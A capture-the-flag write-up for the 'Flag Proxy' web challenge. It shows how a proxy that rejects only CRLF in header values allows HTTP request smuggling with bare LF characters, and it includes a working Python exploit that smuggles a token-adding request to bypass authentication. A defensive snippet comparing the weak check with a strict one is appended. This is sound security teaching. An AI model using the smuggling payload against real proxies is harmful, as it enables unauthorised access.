Flag Proxy

WEB | 471 pts - 41 solves


Last updated 10 months ago

Description: I just added authentication to my flag service (server-back) thanks to a proxy (server-front), but a friend said it's useless...
Site:
Author: @Giotino

Looking at the challenge, we see that the website is powered by Express.js. In the source code we see that the front end accepts two endpoints: /flag and /add-token. To get the flag we make a request with the ?token parameter; its value is copied into the Authorization header that is sent to the backend, and to be valid it must be present in the tokens[] array. We can add values to the tokens[] array by making a request to /add-token with the parameters ?token (the token we want to set) and ?auth (some sort of password).

Looking only at the logic of these two endpoints, it would seem almost impossible to find an attack vector. But looking beyond the index.js files, we notice that in server-front, http-client.js manages and parses all the requests and responses of the application. Looking more carefully, we notice that it checks that the headers we pass contain no LF character, to protect from HTTP request smuggling attacks. However, the program only checks for the CRLF sequence, not for a bare LF on its own, which, given that the proxy speaks HTTP/1.0 over an old version of Node.js, could work. We also need a way to chain requests in HTTP/1.0 (modern HTTP smuggling techniques such as Transfer-Encoding: chunked won't work); this can be done by setting the header Connection: keep-alive. Let's try to craft a double smuggling request against the Docker container running locally, so we can analyze the logs:

It's working! Now, let's make a request to /add-token with an arbitrary token, so that our token is written into the tokens[] array, bypassing the app's checks (the auth parameter), and then get the flag:

import requests

url = "http://flag-proxy.challs.teamitaly.eu/flag"
token = "httpsmugglingiscool"
# Bare LF line breaks pass the front end's CRLF-only check, so the extra header
# block and a second request line end up inside the Authorization header value.
smuggle = f"SMUGGLE\nContent-Length: 0\nConnection: keep-alive\n\nGET /add-token?token={token} HTTP/1.0"

# First request: the proxy forwards our token as the Authorization header; on the
# keep-alive HTTP/1.0 connection the smuggled /add-token request is read next,
# storing our token in tokens[] without the auth parameter being checked.
req1 = requests.get(url, params={"token": smuggle})
#print(req1.text)

# Second request: the token is now valid, so the proxy returns the flag.
req2 = requests.get(url, params={'token': token})
print(req2.json()['body'])

flag{sanity_check}
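As an added illustration (not the challenge's own code), the snippet below contrasts the CRLF-only header check described above with a strict one, and runs both against a simulated proxy whose backend parser accepts a bare LF as a line terminator. The token value, the request builder and the lenient parser are all assumptions constructed for this example; the real front end receives the token URL-encoded in the query string, which is skipped here.

```javascript
// Added example, not the challenge's http-client.js: weak vs. strict header
// value validation, and what a bare LF does to a lenient HTTP/1.0 parser.

// Weak check, as the writeup describes: only the CRLF sequence is rejected.
function weakHeaderCheck(value) {
  return !value.includes("\r\n");
}

// Hardened check: reject any CR or LF (and other control bytes) anywhere in
// the value, regardless of which sequence they appear in.
function strictHeaderCheck(value) {
  return !/[\r\n\x00-\x1f\x7f]/.test(value);
}

// Request the front end would forward to the backend, copying the user-supplied
// token straight into the Authorization header (assumed layout).
function buildBackendRequest(token) {
  return `GET /flag HTTP/1.0\r\nAuthorization: ${token}\r\nConnection: keep-alive\r\n\r\n`;
}

// Lenient parser: splits on LF, tolerates a missing CR, and counts how many
// request lines ("METHOD path HTTP/1.x") it sees on the wire.
function countRequestsOnWire(bytes) {
  return bytes
    .split("\n")
    .map(l => l.replace(/\r$/, ""))
    .filter(l => /^[A-Z]+ \S+ HTTP\/1\.[01]$/.test(l)).length;
}

// Run a token through a given check and report what reaches the backend.
function simulateProxy(token, check) {
  if (!check(token)) return { accepted: false, requestsOnWire: 0 };
  return { accepted: true, requestsOnWire: countRequestsOnWire(buildBackendRequest(token)) };
}

// Constructed token in the shape the writeup uses: bare LFs, then a second request line.
const smuggledToken =
  "SMUGGLE\nContent-Length: 0\nConnection: keep-alive\n\nGET /add-token?token=x HTTP/1.0";

console.log(simulateProxy(smuggledToken, weakHeaderCheck));   // accepted, 2 requests on the wire
console.log(simulateProxy(smuggledToken, strictHeaderCheck)); // rejected before anything is sent
```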

http://flag-proxy.challs.olicyber.it